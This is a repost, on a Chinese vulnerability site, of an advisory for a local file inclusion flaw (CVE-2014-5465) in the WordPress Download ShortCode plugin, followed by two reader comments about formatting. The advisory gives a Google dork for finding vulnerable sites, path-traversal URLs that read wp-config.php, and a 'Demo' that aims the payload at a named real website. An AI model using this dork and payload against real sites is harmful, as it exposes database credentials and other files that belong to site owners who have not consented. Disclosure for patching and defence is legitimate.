漏洞时代 - 最新漏洞_0DaY5.CoM漏洞时代 - 最新漏洞_0DaY5.CoM

WordPress ShortCode Plugin - Local File Inclusion Vulnerability

#
# Title : WordPress ShortCode Plugin - Local File Inclusion Vulnerability
# Severity : High+/Critical
# Reporter(s) : Mehdi Karout & Christian Galeone
# Google Dork : inurl:wp/wp-content/force-download.php
# Plugin Version : 1.1
# Plugin Name : Download ShortCode
# Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip
# Vendor Home : http://werdswords.com/
# Date : 25/08/2014
# Tested in : Win7 - Kali Linux
# CVE : CVE-2014-5465
#
#
# PoC :
#
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File]
#
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php
#
# Exploit Code :
[php]
$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");//直接包含了
}
else
{
include("index.php");
}
[/php]
# Demo :
#
# http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » WordPress ShortCode Plugin - Local File Inclusion Vulnerability

评论 2

  1. 样式有问题
    那个#########

    小飞 2014-08-31    回复
    • 不是样式,而是复制的时候一起复制了

      0day5 2014-09-02    回复